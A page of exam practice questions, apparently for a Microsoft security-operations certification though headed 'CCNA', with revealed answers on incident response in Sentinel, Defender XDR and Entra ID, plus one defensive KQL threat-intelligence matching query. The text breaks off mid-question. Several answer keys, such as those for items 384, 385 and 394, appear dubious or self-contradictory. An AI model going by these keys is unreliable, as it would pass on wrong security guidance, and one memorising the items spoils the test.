CCNA Respond to security incidents Questions

75 of 489 questions · Page 6/7 · Respond to security incidents · Answers revealed

376
MCQ · medium

Your organization uses Microsoft Sentinel. A security analyst reports that an incident was automatically closed by a playbook before the investigation was complete. What should you do to prevent automatic closure in the future?

A. Disable the playbook
B. Remove the playbook from the automation rule
C. Modify the analytics rule to not automatically close incidents
D. Disable the automation rule that triggers the playbook
Answer: C

This prevents the playbook from closing incidents automatically.

Why this answer

Option C is correct because modifying the analytics rule to disable automatic incident closure stops the playbook from closing incidents automatically. Option A is wrong because disabling the playbook stops all its actions, not just closure. Option B is wrong because removing the playbook from the rule entirely is too drastic and unnecessary.

Option D is wrong because it disables the whole automation rule.

377
MCQ · hard

Refer to the exhibit. You are reviewing an automation rule in Microsoft Sentinel. What will happen when a new incident with severity Medium is created?

A. The rule will not trigger because severity is Medium
B. The rule will trigger and create a new incident
C. The rule will trigger and run the playbook
D. The rule will update the incident severity to High
E. The rule will trigger but skip the playbook
Answer: A

Condition is not met.

Why this answer

The automation rule triggers only on 'IncidentCreated' with condition 'IncidentSeverity Equals High'. Medium severity does not meet the condition, so the rule does not run.

378
MCQ · medium

Refer to the exhibit. You are reviewing a Microsoft Sentinel automation rule definition. The rule is intended to automatically change the severity to High, assign to tier2, and set status to Active for incidents triggered by alerts containing 'malware'. However, incidents are not being updated. What is the most likely cause?

A. The action configuration is missing the 'incident' property.
B. The condition operator 'Contains' is incorrect; it should be 'Equals'.
C. The trigger type should be 'IncidentCreated', not 'AlertRule'.
D. The playbook requires a managed identity to run.
Answer: C

Automation rules trigger on incident creation, not alert rule.

Why this answer

Option C is correct because the trigger type is 'Microsoft.SecurityInsights/AlertRule', which triggers on alert creation, not incident creation. Automation rules in Sentinel trigger on incident creation, not alert creation. Option A is wrong because the actions are correctly structured.

Option B is wrong because the condition is valid. Option D is wrong because there is no such requirement.

379
MCQ · easy

An organization uses Microsoft Defender for Endpoint. A user reports that their device is running slowly and they see unexpected pop-ups. The security team suspects malware. What should the team do first to investigate?

A. Run a quick scan on the device from Microsoft Defender for Endpoint
B. Check the device inventory for recent software installations
C. Initiate a live response session on the device
D. Submit a suspicious file to Microsoft for analysis
Answer: A

A quick scan detects common malware efficiently.

Why this answer

Option A is correct because running a quick scan in Microsoft Defender for Endpoint will detect common malware quickly. Option B is wrong because checking the device inventory does not help with active malware. Option C is wrong because initiating a live response session is more invasive and should be used after initial detection.

Option D is wrong because submitting the file to Microsoft for analysis is not the first step.

380
MCQ · medium

You are investigating an incident in Microsoft Defender XDR that involves a user who clicked a link in a phishing email. The email was detected and blocked by Microsoft Defender for Office 365, but the user still clicked the link before it was blocked. The incident includes an alert for 'Malicious URL click'. What additional information should you check to determine if the user's credentials were compromised?

A. Check if the link was blocked by the time the user clicked
B. Check for sign-in events from unusual locations or anonymous IP addresses after the click
C. Check if the user has recently changed their password
D. Check if the email had any attachments
Answer: B

Such sign-ins indicate that the attacker used stolen credentials.

Why this answer

Option B is correct because a URL click could lead to a credential harvesting page, and subsequent sign-ins from unusual locations or anonymous IP addresses indicate that the stolen credentials were used. Option A is wrong because the block already happened; the click is what matters.

Option C is wrong because a password reset does not indicate compromise. Option D is wrong because the email was blocked, so there was no attachment.

381
MCQ · medium

You are a security analyst at Contoso. A user reports that they received a suspicious email with an attachment named "Invoice.pdf.exe". The user did not open the attachment. You need to investigate this potential threat using Microsoft Defender XDR. You want to determine if any other users received the same email, and whether the attachment was detonated in a sandbox. You also want to block the sender domain and the attachment hash across the organization if it is malicious. You have the email message ID from the user. You have appropriate permissions to use advanced hunting and take action. Which set of actions should you take in Microsoft 365 Defender?

A. Use the Exchange admin center to run a message trace for the email, then use the Malware section to block the attachment hash.
B. Use Email & collaboration > Explorer to find the email, then use the Quarantine section to block the sender domain.
C. Use Threat Explorer to find the email, then manually block the sender domain in Exchange Online PowerShell.
D. Use Advanced hunting to query EmailEvents for the message ID to find other recipients, then query EmailAttachmentInfo to get the attachment hash. Use the sandbox data in EmailUrlInfo to check detonation. Then create an indicator block rule for the sender domain and file hash in Settings > Indicators.
Answer: D

This comprehensive approach uses advanced hunting for investigation and indicators for blocking.

Why this answer

Option D is correct because advanced hunting can identify other recipients and sandbox detonation results, and indicators can block the sender domain and file hash. Option A is wrong because message trace is an Exchange admin center feature, not Defender XDR. Option B is wrong because the quarantine view doesn't show sandbox results.

Option C is wrong because it does not use indicators for blocking.

382
MCQ · hard

You are responding to an incident where a user's Microsoft Entra ID account was compromised and used to send phishing emails internally. You need to prevent further damage. Which two actions should you take first?

A. Reset the user's password
B. Revoke the user's sessions
C. Disable the user account in Microsoft Entra ID
D. Block all external email from the organization
E. Remove the user from all distribution groups
Answer: B, C

Invalidates any active tokens.

Why this answer

Option B is correct because revoking sessions ensures any active tokens are invalidated. Option C is correct because disabling the account stops immediate use. Option A is wrong because resetting the password is secondary.

Option D is wrong because blocking external email is too broad. Option E is wrong because it's unnecessary for internal phishing.

383
MCQ · medium

During an incident involving a compromised Azure VM, the security team wants to capture a memory dump for forensic analysis. The VM is running Windows Server 2022. What is the recommended approach?

A. Use Azure Backup to create a VM snapshot.
B. Establish a PowerShell remote session and run 'Get-Process | Export-CliXML'.
C. Initiate a live response session on the VM and run the 'dump memory' command.
D. Use Azure Disk Encryption to export the disk.
Answer: C

Live response in Microsoft Defender for Endpoint can collect memory dumps for analysis.

Why this answer

Option C is correct because initiating a live response session in Microsoft Defender for Endpoint allows running a memory dump collection command. Option A is wrong because a backup snapshot captures the disk, not memory. Option B is wrong because PowerShell remoting may not work if the VM is isolated.

Option D is wrong because exporting the disk captures disk state, not memory.

384
MCQ · medium

You are investigating a security incident in Microsoft Defender XDR where a user received a phishing email that bypassed Exchange Online Protection. The email contained a link to a credential harvesting page. After the user entered credentials, the attacker used them to sign in from an unusual location. You need to recommend an automated response to prevent further credential theft from similar emails. What should you implement?

A. Create an Attack Simulation Training campaign in Microsoft Defender for Office 365.
B. Enable Cloud App Security to detect and block malicious cloud apps.
C. Enable a Safe Links policy for all users.
D. Configure a Conditional Access policy to block sign-ins from unusual locations.
Answer: A

Attack Simulation Training educates users on recognizing phishing attempts, reducing the likelihood of credential theft.

Why this answer

Option A is correct because Attack Simulation Training in Microsoft Defender for Office 365 can create and automate phishing campaigns to train users, reducing the risk of credential theft. Option B is wrong because Cloud App Security is for shadow IT discovery, not email-based phishing prevention. Option C is wrong because Safe Links protects against malicious links in real time but does not train users.

Option D is wrong because Conditional Access policies require an identity provider and are not an automated response to emails.

385
MCQ · hard

During an incident response, a forensic investigator needs to collect a memory dump from a compromised Windows server that is still running. The server has Microsoft Defender for Endpoint installed but is not connected to the internet. Which method should the investigator use?

A. Collect a system memory snapshot from the Microsoft 365 Defender portal
B. Use Live Response to run a memory dump collector on the device
C. Initiate a memory dump from the Microsoft Defender for Endpoint portal
D. Use the Sysinternals Suite to capture a memory dump locally
Answer: B

Live Response works even when the device is offline by using a separate communication channel.

Why this answer

Option B is correct because Live Response allows a live memory dump from an offline device via a connected channel. Option A is wrong because snapshot collection requires the device to be online. Option C is wrong because the device is offline, so the portal cannot initiate a dump.

Option D is wrong because Sysinternals is not part of Microsoft's recommended forensic toolkit for this scenario.

386
MCQ · easy

You are an incident responder for a company using Microsoft 365 Defender. A critical incident is assigned to you. What is the first action you should take according to best practices?

A. Triage the incident to determine the scope and severity.
B. Escalate the incident to senior management.
C. Immediately isolate all affected devices.
D. Collect a full memory dump from the affected systems.
Answer: A

Triage is the first recommended step in any incident response.

Why this answer

Option A is correct because the first step in incident response is to triage the incident to understand its scope and severity before taking any action. Option B is wrong because escalation should occur after initial triage if needed. Option C is wrong because isolating devices should only be done after assessing the impact.

Option D is wrong because you need to investigate before collecting data.

387
MCQ · hard

During a ransomware incident, you need to prevent the encryption of files on a server running Windows Server 2022. You have Microsoft Defender for Endpoint Plan 2. Which attack surface reduction rule should you enable?

A. Block executable files from running unless they meet a prevalence, age, or trusted list criterion
B. Block credential stealing from the Windows local security authority subsystem
C. Block Adobe Reader from creating child processes
D. Use advanced protection against ransomware
Answer: D

Specifically blocks ransomware.

Why this answer

Option D is correct because 'Use advanced protection against ransomware' is a specific ASR rule that blocks ransomware behavior. Option A is wrong because 'Block executable files from running unless they meet a prevalence, age, or trusted list criterion' helps against unknown executables but not specifically ransomware. Option B is wrong because 'Block credential stealing from the Windows local security authority subsystem' targets credential theft.

Option C is wrong because 'Block Adobe Reader from creating child processes' is for PDF exploits.

388
MCQ · medium

Based on the KQL query shown, what is the purpose of the case() function?

A. To aggregate counts by severity
B. To include alerts with a name containing Malware or Ransomware
C. To filter alerts with severity High or Critical
D. To reclassify High severity alerts as Critical
Answer: D

The case() function changes AlertSeverity value from 'High' to 'Critical'.

Why this answer

Option D is correct because case() reclassifies 'High' severity alerts as 'Critical' for better prioritization. Option A is wrong because case() does not aggregate; summarize does that. Option B is wrong because the query already filters for Malware and Ransomware.

Option C is wrong because case() does not filter alerts; it only transforms the Severity field.

389
Multi-Select · medium

Which TWO actions should a security analyst take to contain a ransomware outbreak on a Windows server that has Microsoft Defender for Endpoint installed?

Select 2 answers
A. Run a full scan with Microsoft Defender Antivirus
B. Reset the local administrator password
C. Initiate device isolation
D. Uninstall Microsoft Defender for Endpoint and reinstall
E. Restore the system from a backup
Answers: A, C

A full scan can detect and remove the ransomware.

Why this answer

Options A and C are correct. C isolates the device to prevent lateral movement, and A runs a scan to remove the ransomware. Option B is wrong because resetting the password does not stop the ransomware.

Option D is wrong because uninstalling would remove protection. Option E is wrong because a full restore might reintroduce the malware.

390
Multi-Select · hard

Your organization uses Microsoft Sentinel. A security incident related to a compromised user account has been fully investigated and remediated. Which THREE steps should you take to close the incident properly? (Choose three.)

Select 3 answers
A. Verify that all related alerts are resolved or closed.
B. Create a new analytics rule to detect similar activity.
C. Change the incident status to Closed and select an appropriate classification.
D. Add comments summarizing the investigation and remediation steps.
E. Delete the incident to clean up the workspace.
Answers: A, C, D

Ensures no residual alerts.

Why this answer

Options A, C, and D are correct. Verifying that no related alerts remain prevents lingering issues, changing the status to Closed with a classification provides closure, and adding comments documents the investigation. Option B (creating a detection rule) is not necessary for closure.

Option E (deleting the incident) is not recommended.

391
MCQ · hard

Your Microsoft Sentinel workspace is receiving a high volume of false positive alerts from a specific analytics rule. You need to suppress these alerts without disabling the rule. Which feature should you use?

A. Create an automation rule to close incidents
B. Adjust the alert threshold in the analytics rule
C. Configure alert suppression in the analytics rule
D. Disable incident creation for the rule
Answer: C

Alert suppression stops the rule from creating alerts for matching conditions.

Why this answer

Option C is correct because alert suppression in Sentinel allows you to temporarily suppress alerts matching specific criteria. Option A is wrong because automation rules execute actions but do not suppress alerts. Option B is wrong because the alert threshold is a rule setting, not a suppression mechanism.

Option D is wrong because the incident creation setting only controls whether incidents are created, not alert suppression.

392
Multi-Select · medium

Your organization is responding to a ransomware incident. Which TWO actions should be taken first to contain the incident while preserving forensic evidence?

Select 2 answers
A. Isolate affected devices using Microsoft Defender for Endpoint.
B. Reset passwords for all users in the organization.
C. Disable compromised user accounts in Microsoft Entra ID.
D. Perform a factory reset on all affected devices.
E. Shut down network switches to isolate the network segment.
Answers: A, C

Isolation contains the threat and preserves data.

Why this answer

Option A (isolate affected devices) and Option C (disable compromised accounts) are correct first steps to contain the incident, as they stop lateral movement and further damage while preserving evidence. Option B is wrong because resetting passwords for all users is broad and not a containment step. Option D is wrong because wiping devices destroys evidence.

Option E is wrong because shutting down network switches may be necessary but is not a standard first step.

393
MCQ · easy

During an incident response, a SOC analyst needs to automatically collect relevant evidence from multiple Microsoft 365 services. Which Microsoft Sentinel playbook trigger should the analyst configure?

A. Microsoft Sentinel Playbook trigger 'When a response action is executed'.
B. Microsoft Sentinel Scheduled Analytics rule trigger.
C. Microsoft Sentinel Alert trigger.
D. Microsoft Sentinel Incident trigger with action 'Collect evidence'.
Answer: D

Incident trigger allows playbooks to run on incident creation and collect evidence from various sources.

Why this answer

Option D is correct because the incident trigger ('When an incident is triggered') allows automation based on Sentinel incidents. Option A is wrong because 'When a response action is executed' is not a standard trigger. Option B is wrong because a scheduled query is for hunting, not for automated response.

Option C is wrong because the alert trigger ('When a new alert is created') is too granular and not designed for multi-service evidence collection.

394
MCQ · easy

A security analyst in your organization receives an alert from Microsoft Defender for Cloud Apps indicating that a user has installed a third-party app with high permissions in Microsoft 365. The analyst suspects a consent phishing attack. Which playbook in Microsoft Sentinel should the analyst use to automate the investigation and remediation?

A. Automation rule
B. Hunting query
C. Entity page
D. Workbook
Answer: C

Entity page provides a consolidated view of all activities related to a user.

Why this answer

The correct answer is C because the 'Entity page' in Microsoft Sentinel provides a consolidated view of all alerts, incidents, and activities related to a specific user, enabling efficient investigation of consent phishing. Option A is wrong because automation rules are for automated response, not investigation. Option B is wrong because hunting queries are for proactive threat hunting, not immediate investigation.

Option D is wrong because workbooks are for visualizations and reporting, not investigation.

395
Multi-Select · medium

Which TWO actions should you perform to contain a ransomware incident in Microsoft Defender for Endpoint?

Select 2 answers
A. Reset the local administrator password.
B. Isolate the device from the network.
C. Run a full antivirus scan.
D. Kill the malicious processes.
E. Collect the ransomware sample for analysis.
Answers: B, D

Isolation stops communication with command and control.

Why this answer

Options B and D are correct. Isolating the device prevents further spread, and killing malicious processes stops encryption. Option A is wrong because resetting passwords is for user accounts, not endpoints.

Option C is wrong because running antivirus may not be immediate containment. Option E is wrong because collecting files is for investigation, not containment.

396
MCQ · easy

A security analyst receives a Microsoft Defender for Identity alert about a suspicious Kerberos attack. The analyst needs to contain the compromised account immediately. What should the analyst do?

A. Disable the user account in Microsoft Entra ID.
B. Remove the user from all privileged groups.
C. Require the user to change their password at next sign-in.
D. Reset the user's password and notify the user.
Answer: A

Disabling stops all authentication.

Why this answer

Option A is correct because disabling the account in Microsoft Entra ID stops authentication. Option B is wrong because removing the user from groups does not prevent authentication. Option C is wrong because requiring a password change at next sign-in may not be effective.

Option D is wrong because resetting the password without disabling the account may allow ongoing attacks.

397
Multi-Select · easy

Which TWO of the following are valid data connectors for Microsoft Sentinel? (Select TWO.)

Select 2 answers
A. Docker containers
B. Amazon RDS
C. Azure Firewall
D. Google Cloud Storage
E. Microsoft Entra ID
Answers: C, E

Azure Firewall connector is available.

Why this answer

Options C and E are correct. Azure Firewall and Microsoft Entra ID have built-in connectors. Option A is wrong because Docker is not a data source for Sentinel.

Option B is wrong because Amazon RDS is not a direct connector. Option D is wrong because Google Cloud Storage is not a default connector; it requires custom ingestion.

398
MCQ · medium

During an investigation, you need to check if any user has been assigned privileged roles in Microsoft Entra ID outside of normal business hours. Which data source would provide this information?

A. OfficeActivity (Office 365)
B. SecurityEvent (Windows Event Logs)
C. SigninLogs (Microsoft Entra ID)
D. AuditLogs (Microsoft Entra ID)
Answer: D

AuditLogs track administrative activities including role assignments.

Why this answer

Option D is correct because AuditLogs in Azure AD (now Microsoft Entra ID) capture role assignment changes. Option A (OfficeActivity) is for Office 365 workloads. Option B (SecurityEvent) is for Windows events.

Option C (SigninLogs) shows sign-ins but not role changes.

399
MCQ · hard

Fabrikam has a hybrid environment with on-premises Active Directory synced to Microsoft Entra ID. They use Microsoft Sentinel and Microsoft Defender XDR. A critical incident is opened: 'Credential theft detected - domain admin account compromised.' The incident includes alerts from Microsoft Defender for Identity (MDI) showing anomalous Kerberos ticket requests and from Microsoft Defender for Endpoint showing a process dump on a domain controller. You need to contain the incident immediately. The organization has a strict policy of not disabling the domain admin account without approval due to critical dependencies. Which of the following is the BEST course of action?

A. Reset the domain admin password and revoke sessions in Microsoft Entra ID.
B. Disable the domain admin account temporarily.
C. Isolate the domain controller using Microsoft Defender for Endpoint.
D. Reset the krbtgt account password twice to force Kerberos ticket invalidation.
Answer: D

This invalidates all existing Kerberos tickets, cutting off attacker access.

Why this answer

Option D is correct: resetting the krbtgt account password twice forces all Kerberos tickets to be invalidated, effectively containing credential theft without disabling the account. Option A is wrong because resetting the domain admin password alone does not invalidate existing Kerberos tickets. Option B is wrong because disabling the account violates policy.

Option C is wrong because isolating the domain controller would disrupt services.

400
Multi-Select · medium

Which THREE steps should be included in a Microsoft Sentinel playbook for automatic incident response when a high-severity alert fires?

Select 3 answers
A. Investigate the alert by enriching it with threat intelligence
B. Notify the security team via email or Teams
C. Pause the incident for 24 hours before taking action
D. Create a new Azure resource for logging
E. Contain the threat by blocking indicators
Answers: A, B, E

Enrichment helps validate the alert.

Why this answer

The playbook should investigate, contain, and notify. Pausing the incident is not standard; the playbook should run immediately. Creating a new Azure resource is not typically part of incident response.

401
Multi-Select · hard

Which THREE conditions must be met for Microsoft Sentinel to automatically run a playbook on an incident?

Select 3 answers
A. The incident severity must be set to High or Critical
B. The playbook must have the Sentinel Responder role assigned
C. The incident must be created by a scheduled or NRT analytics rule
D. The user must be signed in to the Azure portal
E. The playbook must be set to 'Enabled' on the automation rule
Answers: B, C, E

Permissions are required for the playbook to run.

Why this answer

The playbook must be enabled for automatic triggers, the incident must be created by an analytics rule, and the playbook must have the correct permissions. The user does not need to be signed in, and the incident does not need to be of a specific severity.

402
MCQ · medium

You are responding to an incident where a user's credentials were used to access a federated SaaS application from an IP address associated with a known threat actor. The user's account is not disabled. Which action is most effective to prevent further unauthorized access?

A. Reset the user's password and revoke active sessions
B. Create a Conditional Access policy to block the IP
C. Disable the user's account
D. Block the source IP address on the firewall
Answer: A

This invalidates the compromised credentials and terminates current sessions.

Why this answer

Resetting the user's password and revoking tokens is the most effective because it invalidates current sessions and prevents further use of stolen credentials. Disabling the account is also effective but may cause business disruption; resetting and revoking is less disruptive. Blocking the IP may not be effective if the threat actor uses different IPs.

Conditional access policy change is slower.

403
Multi-Select · medium

Which THREE actions should you take when investigating a potential data exfiltration incident detected by Microsoft Defender for Cloud Apps?

Select 3 answers
A. Create a file policy to detect similar activities in the future
B. Check Microsoft Defender for Identity for related alerts
C. Use the investigation tools to search for related events in Microsoft Sentinel
D. Run a cloud discovery report to identify unsanctioned apps
E. Review the user's activity log in the Defender for Cloud Apps portal
Answers: A, C, E

Helps in preventing future exfiltration.

Why this answer

Option A is correct because file policies are key to catching similar activity. Option C is correct because SIEM integration provides context. Option E is correct because reviewing the user's activity log lets governance actions be applied to the user.

Option B is wrong because MDI is for on-premises AD. Option D is wrong because cloud discovery is for shadow IT.

404
Multi-Select · medium

Which THREE components can be used in Microsoft Sentinel to automate incident response?

Select 3 answers
A. Automation rules
B. Triggers
C. Playbooks
D. Watchlists
E. Analytics rules
Answers: A, B, C

Automation rules define conditions and actions for incident response.

Why this answer

Correct answers are A, B, and C. Automation rules, triggers, and playbooks are part of Microsoft Sentinel's automation capabilities. Analytics rules generate incidents but do not automate response.

Watchlists are for enrichment, not automation.

405
MCQ · medium

Your organization uses Microsoft Defender for Cloud Apps. A security analyst receives an alert for a suspicious sign-in from an IP address in a sanctioned app. The analyst needs to immediately block the user from accessing the app. Which action should the analyst take?

A. Suspend the user account in Microsoft Entra ID.
B. Add the IP address to the blocked IP list in Defender for Cloud Apps.
C. Create a new access policy in Defender for Cloud Apps to block the user.
D. Revoke the user's session tokens in Microsoft Entra ID.
Answer: A

Suspending the user immediately blocks all access, including the sanctioned app.

Why this answer

Option A is correct because suspending the user in Microsoft Entra ID is the fastest way to block access across all apps. Option B is wrong because blocking the IP may affect other users. Option C is wrong because creating a block policy takes time.

Option D is wrong because revoking session tokens may not prevent new sign-ins immediately.

406
MCQ · medium

You are responding to an incident where a malicious PowerShell script was executed on multiple endpoints. You need to collect the script content from the affected devices for analysis. What should you use?

A. Microsoft Defender for Cloud Apps activity logs
B. Microsoft Defender for Endpoint live response
C. Microsoft Purview eDiscovery
D. Azure Automation runbook
Answer: B

Live response allows file collection and script execution.

Why this answer

Option B is correct because Microsoft Defender for Endpoint live response allows you to remotely collect files from devices. Option A is wrong because Microsoft Defender for Cloud Apps is for cloud apps. Option C is wrong because Microsoft Purview eDiscovery is for legal discovery.

Option D is wrong because Azure Automation runbooks are for orchestration.

407
MCQ · hard

Your organization uses Microsoft Sentinel and Microsoft Defender for Cloud. A critical server in Azure was compromised by ransomware. The incident response team needs to ensure that no other resources in the same resource group are affected. What is the most immediate containment action?

A. Delete the virtual machine immediately to stop the ransomware.
B. Disable the public IP address and apply an NSG rule to block all inbound/outbound traffic to the server's subnet.
C. Change the local administrator password on the VM.
D. Move the VM to a different virtual network and subnet.
Answer: B

This network isolation prevents lateral movement while preserving the VM for forensic analysis.

Why this answer

Option B is correct because disabling the public IP and applying a network security group (NSG) block isolates the server while preserving the disk. Option A is wrong because deleting the VM destroys evidence. Option C is wrong because changing the administrator password does not stop ransomware from running.

Option D is wrong because moving the VM to a different subnet does not prevent lateral movement from the original IP.

408
MCQ · hard

During an incident response, a security engineer needs to block an attacker's IP address at the network level for all devices in the organization. The organization uses Microsoft Defender for Endpoint and Microsoft Intune for device management. What is the most efficient way to achieve this?

A. Add the IP address to a blocklist in Microsoft Sentinel
B. Create a device configuration policy in Microsoft Intune to block the IP
C. Configure Azure Firewall to block the IP
D. Create a custom indicator (IOC) for the IP address in Microsoft Defender for Endpoint
Answer: D

Custom indicators block IPs across all Defender for Endpoint devices.

Why this answer

Option D is correct because a custom indicator in Defender for Endpoint blocks the IP across all onboarded devices. Option A is wrong because blocking in Microsoft Sentinel only affects log ingestion, not network traffic. Option B is wrong because Intune policies are for configuration, not real-time blocking.

Option C is wrong because Azure Firewall would need to be in the network path and is a separate product.

409
Multi-Selecthard

You are investigating a potential data exfiltration incident in Microsoft Purview. A user has been downloading large amounts of data from a SharePoint site to an unmanaged device. Which TWO actions should you take to contain the exfiltration? (Choose two.)

Select 2 answers
A.Remove the user's permissions to the SharePoint site.
B.Apply a sensitivity label to the SharePoint site to restrict access.
C.Create a data loss prevention (DLP) policy to block downloads from unmanaged devices.
D.Disable the user's device in Microsoft Intune.
E.Create a retention policy for the SharePoint site.
AnswersA, C

Removing permissions immediately stops the user from accessing data.

Why this answer

Options A and C are correct. Removing the user's permissions on the site stops the access that is happening now, and a DLP policy (or a Conditional Access app control policy) that blocks downloads from unmanaged devices stops the same thing happening again from any other unmanaged device.

Option B is wrong because a sensitivity label on the site changes its sharing and external access settings; it does not stop downloads the user is already permitted to make. Option D is wrong because disabling one device in Intune does not stop the user picking up another unmanaged device. Option E is wrong because a retention policy preserves data; it does not restrict access.

410
Multi-Selecteasy

Which TWO are legitimate sources of threat intelligence that can be ingested into Microsoft Sentinel?

Select 2 answers
A.STIX/TAXII threat intelligence feeds
B.Microsoft Defender Threat Intelligence
C.Exchange Online Protection
D.Microsoft Intune
E.Microsoft Purview Compliance Manager
AnswersA, B

Sentinel supports ingesting TI from STIX/TAXII servers.

Why this answer

A is correct because STIX/TAXII is an open standard (from OASIS) for sharing cyber threat intelligence (CTI). Microsoft Sentinel can pull indicators from any TAXII 2.0 or 2.1 server through the built-in Threat Intelligence - TAXII data connector, so structured feeds (an ISAC, a commercial vendor, an open feed) land in the workspace for correlation and alerting. B is correct because Microsoft Defender Threat Intelligence has its own data connector that brings Microsoft's indicators into the same table.

Exam trap

The trap here is that candidates confuse security management tools (like EOP, Intune, or Compliance Manager) with actual threat intelligence sources, assuming any Microsoft security product can be a threat feed, whereas only dedicated CTI platforms or feeds (STIX/TAXII, Microsoft Defender Threat Intelligence) provide structured indicator ingestion.
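Once indicators are ingested they are only useful if something matches them against telemetry. The query below is an added example, not part of the original page; it assumes the classic ThreatIntelligenceIndicator schema and the DeviceNetworkEvents table from the Defender XDR connector (the newer ThreatIntelIndicators table uses a different layout, so adjust the column names if your workspace has moved to it).

```kql
// Added example: match active TI IPv4 indicators against endpoint network events.
// Assumes the classic ThreatIntelligenceIndicator schema and the DeviceNetworkEvents
// table from the Defender XDR connector; adjust names if your workspace differs.
let lookback = 14d;
let active_ips = ThreatIntelligenceIndicator
    | where TimeGenerated >= ago(lookback)
    | where isnotempty(NetworkIP)
    // an indicator is re-ingested every time it is updated; keep the newest version only
    | summarize arg_max(TimeGenerated, *) by IndicatorId
    | where Active == true and ExpirationDateTime > now()
    | project IndicatorId, NetworkIP, ConfidenceScore, ThreatType, Description, SourceSystem;
DeviceNetworkEvents
| where TimeGenerated >= ago(1d)
| where ActionType in ("ConnectionSuccess", "ConnectionRequest", "ConnectionFailed")
| where isnotempty(RemoteIP)
| join kind=inner active_ips on $left.RemoteIP == $right.NetworkIP
| project TimeGenerated, DeviceName, InitiatingProcessAccountName,
          InitiatingProcessFileName, RemoteIP, RemotePort, RemoteUrl,
          ThreatType, ConfidenceScore, SourceSystem, Description
| order by TimeGenerated desc
```

The arg_max step matters: without it a single indicator that has been refreshed several times produces duplicate matches, and an indicator that was later deactivated can still match on its older, still-active row. The built-in "TI map IP entity to ..." analytics rules do the same thing per source table; run this form by hand when you need to check one feed's indicators against one table during an investigation.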

411
MCQeasy

Your organization uses Microsoft Sentinel and Microsoft Defender XDR. You have a custom analytics rule that triggers on a Defender for Endpoint alert. When the rule triggers, a playbook is executed that creates an incident in Microsoft Sentinel and sends a message to a Teams channel. The playbook fails to execute. Which permission should you verify first?

A.The Teams channel has the appropriate permissions for incoming webhooks
B.The analyst has Microsoft Sentinel Reader role
C.The user has Microsoft Entra ID Global Administrator role
D.The automation rule has the correct managed identity or connection permissions
AnswerD

Automation rules use managed identities or connections to run playbooks; misconfiguration causes failure.

Why this answer

Option D is correct because a playbook launched by an automation rule runs under Sentinel's own identity: that identity needs the Microsoft Sentinel Automation Contributor role on the playbook's resource group, and the Logic App's API connections (to Sentinel and to Teams) must be authorised. Either one missing is the usual reason a playbook never starts. Option A is wrong because Teams permissions would only break the final posting step, not the whole run. Option B is wrong because the Sentinel Reader role lets an analyst view incidents and has nothing to do with playbook execution.

Option C is wrong because Global Administrator is not required (and should not be granted) for automation.

412
MCQhard

Your organization has deployed Microsoft Sentinel and uses the Microsoft 365 connector to ingest audit logs. You receive an alert from Microsoft Defender for Office 365 about a phishing email that was delivered to a user's inbox. You need to create an incident in Sentinel and automatically quarantine the email. What is the most efficient way to achieve this?

A.Use Microsoft Defender for Cloud Apps to investigate the alert and manually quarantine the email
B.Create a custom analytics rule that triggers when an alert is generated, and configure the rule to run a playbook that quarantines the email
C.Create an automation rule in Microsoft Sentinel that is triggered when this specific alert is generated, and associate a playbook that uses the Microsoft 365 Defender connector to quarantine the email
D.Manually create an incident in Microsoft Sentinel and then run a playbook to quarantine the email
AnswerC

This automates the response.

Why this answer

Option C is correct because an automation rule that fires on the alert, or on the incident built from it, can run a playbook, and a playbook built on the Microsoft 365 Defender (now Microsoft Defender XDR) connector can remove the message from the mailbox without an analyst touching it. Option A is wrong because Defender for Cloud Apps is the wrong product for mail and the quarantine would still be manual. Option B is wrong because the analytics rule only creates the alert and incident; the playbook is attached through an automation rule, which is what option C spells out.

Option D is wrong because it relies on an analyst creating the incident by hand.

413
MCQmedium

Your organization uses Microsoft Sentinel with the UEBA (User and Entity Behavior Analytics) feature enabled. A security analyst notices that a user account has been flagged with an anomaly indicating a possible compromised credential. Which entity type in Microsoft Sentinel's UEBA is most relevant for this alert?

A.Device
B.Application
C.IP address
D.User account
AnswerD

UEBA focuses on user behavior.

Why this answer

Option D is correct because UEBA baselines each user account's normal sign-in and activity pattern and scores deviations from it, which is exactly what a "possible compromised credential" anomaly is. Option A is wrong because the device is where the sign-in happened, not the entity whose behaviour changed. Option C is wrong because the IP address is context that feeds the score, not the entity being profiled.

Option B is wrong because the application is the target of the sign-in, not the subject of the anomaly.

414
MCQeasy

An incident in Microsoft Defender XDR shows a device with high severity alert: 'Suspicious PowerShell command line.' The device is currently isolated from the network. What is the best next step to investigate the alert?

A.Review the device timeline for related alerts.
B.Run a live response session on the device.
C.Restore network connectivity to allow the device to communicate with the cloud for analysis.
D.Initiate a full antivirus scan on the device.
AnswerB

Live response allows remote investigation and remediation on an isolated device, enabling collection of evidence and running scripts safely.

Why this answer

Live response works on an isolated device because isolation leaves the Defender for Endpoint channel open, so the analyst can list processes, pull files or an investigation package, and run scripts without reconnecting the device to the network. A full scan only tells you what the engine already recognises; reviewing the timeline is useful but collects nothing new from the host; restoring connectivity before the cause is understood risks spreading the threat.

415
Multi-Selecthard

Which TWO actions should you take when responding to a confirmed ransomware incident in Microsoft Defender for Endpoint?

Select 2 answers
A.Run a full antivirus scan on the affected devices.
B.Allow the ransomware executable in the firewall.
C.Collect an investigation package from the affected devices.
D.Isolate the affected devices from the network.
E.Initiate a live response session to delete files.
AnswersA, D

Scanning can remove malware.

Why this answer

Options A and D are correct. Isolating the affected devices stops the ransomware reaching other hosts and its operators, and a full scan removes the components the engine can detect. Option B is wrong because allowing the executable through the firewall lets it keep running and communicating.

Option C is wrong because collecting an investigation package is evidence gathering; do it, but after containment. Option E is wrong because deleting files over live response is ad hoc and can destroy evidence.

416
MCQmedium

Your organization uses Microsoft Sentinel. A security analyst receives an alert indicating that a user account was used to sign in from an unfamiliar location. You need to investigate the incident using Microsoft Defender XDR. Which action should you take first?

A.Create an automated playbook to reset the user's password.
B.Review the alert in the Microsoft Defender XDR portal and classify it as a true or false positive.
C.Turn off the user account in Microsoft Entra ID.
D.Reset the user's password immediately to prevent further access.
AnswerB

First step is to classify the incident.

Why this answer

Option B is correct because triage comes first: confirm from the alert details (location, device, MFA result, other activity on the account) whether the sign-in is a true positive before acting on it. Option A is wrong because automating a password reset before confirming the incident resets passwords on false positives too. Option D is wrong because resetting the password is a containment step that follows classification.

Option C is wrong because turning off the account is likewise containment, not the first step. On a true positive, resetting the password and revoking sessions is the right next move.

417
MCQeasy

During an incident response, you need to collect forensic evidence from a compromised Windows device using Microsoft Defender for Endpoint live response. Which command should you use to gather running processes?

A.dir
B.reg query
C.netstat
D.processes
AnswerD

The 'processes' command lists running processes.

Why this answer

